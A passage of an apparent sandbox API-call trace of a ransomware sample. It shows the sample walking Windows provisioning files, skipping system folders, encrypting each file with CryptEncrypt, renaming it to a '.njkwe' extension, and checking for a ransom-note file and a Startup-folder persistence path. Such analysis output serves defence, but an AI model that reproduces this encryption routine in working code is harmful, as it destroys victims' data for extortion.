dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.347] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x292, lpOverlapped=0x0) returned 1 [0078.347] GetProcessHeap () returned 0xbe0000 [0078.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.347] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.347] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.347] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.347] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.347] CloseHandle (hObject=0x43c) returned 1 [0078.347] GetProcessHeap () returned 0xbe0000 [0078.347] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.347] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\327__connections_cellular_globe (philippines)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\327__connections_cellular_globe (philippines)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.348] GetProcessHeap () returned 0xbe0000 [0078.348] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.348] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c1dec7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c1dec7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c1dec7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", cAlternateFileName="328__C~1.PRO")) returned 1 [0078.348] lstrcmpiW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.348] lstrcmpiW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.348] lstrcmpiW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.348] lstrcmpiW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.348] lstrcmpiW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.348] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml") returned 163 [0078.348] StrStrIW (lpFirst="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.348] lstrcmpW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.348] lstrcmpW (lpString1="328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.348] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\328__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.348] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\328__connections_cellular_globe (philippines)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.349] GetTickCount () returned 0x1153eab [0078.349] GetTickCount () returned 0x1153eab [0078.349] GetTickCount () returned 0x1153eab [0078.349] GetTickCount () returned 0x1153eab [0078.349] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.349] GetProcessHeap () returned 0xbe0000 [0078.349] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.349] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0078.350] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.350] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0078.351] GetProcessHeap () returned 0xbe0000 [0078.351] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.351] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.351] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.351] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.351] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.351] CloseHandle (hObject=0x43c) returned 1 [0078.351] GetProcessHeap () returned 0xbe0000 [0078.351] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.351] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\328__connections_cellular_globe (philippines)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\328__Connections_Cellular_Globe (Philippines)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\328__connections_cellular_globe (philippines)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.352] GetProcessHeap () returned 0xbe0000 [0078.352] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.352] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c44137, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c44137, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c44137, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", cAlternateFileName="329__C~1.PRO")) returned 1 [0078.352] lstrcmpiW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.352] lstrcmpiW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.352] lstrcmpiW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.352] lstrcmpiW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.352] lstrcmpiW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.352] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml") returned 163 [0078.352] StrStrIW (lpFirst="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.352] lstrcmpW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.352] lstrcmpW (lpString1="329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.352] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\329__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.352] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\329__connections_cellular_smart (philippines)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.353] GetTickCount () returned 0x1153eab [0078.353] GetTickCount () returned 0x1153eab [0078.353] GetTickCount () returned 0x1153eab [0078.353] GetTickCount () returned 0x1153eab [0078.353] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.353] GetProcessHeap () returned 0xbe0000 [0078.353] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.353] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0078.354] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.354] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0078.355] GetProcessHeap () returned 0xbe0000 [0078.355] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.355] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.355] CloseHandle (hObject=0x43c) returned 1 [0078.355] GetProcessHeap () returned 0xbe0000 [0078.355] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.355] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\329__connections_cellular_smart (philippines)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\329__Connections_Cellular_Smart (Philippines)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\329__connections_cellular_smart (philippines)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.356] GetProcessHeap () returned 0xbe0000 [0078.356] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.356] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901d57cf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901d57cf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901d57cf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="32__CO~1.PRO")) returned 1 [0078.356] lstrcmpiW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.356] lstrcmpiW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.356] lstrcmpiW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.356] lstrcmpiW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.356] lstrcmpiW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.356] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml") returned 164 [0078.356] StrStrIW (lpFirst="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.356] lstrcmpW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.356] lstrcmpW (lpString1="32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.357] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\32__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.357] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\32__connections_cellular_azercell (azerbaijan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.357] GetTickCount () returned 0x1153ebb [0078.357] GetTickCount () returned 0x1153ebb [0078.357] GetTickCount () returned 0x1153ebb [0078.357] GetTickCount () returned 0x1153ebb [0078.357] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.357] GetProcessHeap () returned 0xbe0000 [0078.358] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.358] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0078.359] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.359] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0078.359] GetProcessHeap () returned 0xbe0000 [0078.359] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.359] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.359] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.359] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.359] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.360] CloseHandle (hObject=0x43c) returned 1 [0078.360] GetProcessHeap () returned 0xbe0000 [0078.360] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.360] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\32__connections_cellular_azercell (azerbaijan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\32__Connections_Cellular_Azercell (Azerbaijan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\32__connections_cellular_azercell (azerbaijan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.360] GetProcessHeap () returned 0xbe0000 [0078.360] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.360] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c44137, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c44137, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c44137, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", cAlternateFileName="330__C~1.PRO")) returned 1 [0078.360] lstrcmpiW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.360] lstrcmpiW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.360] lstrcmpiW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.360] lstrcmpiW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.360] lstrcmpiW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.360] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml") returned 170 [0078.361] StrStrIW (lpFirst="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.361] lstrcmpW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.361] lstrcmpW (lpString1="330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.361] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\330__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.361] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml" (normalized: 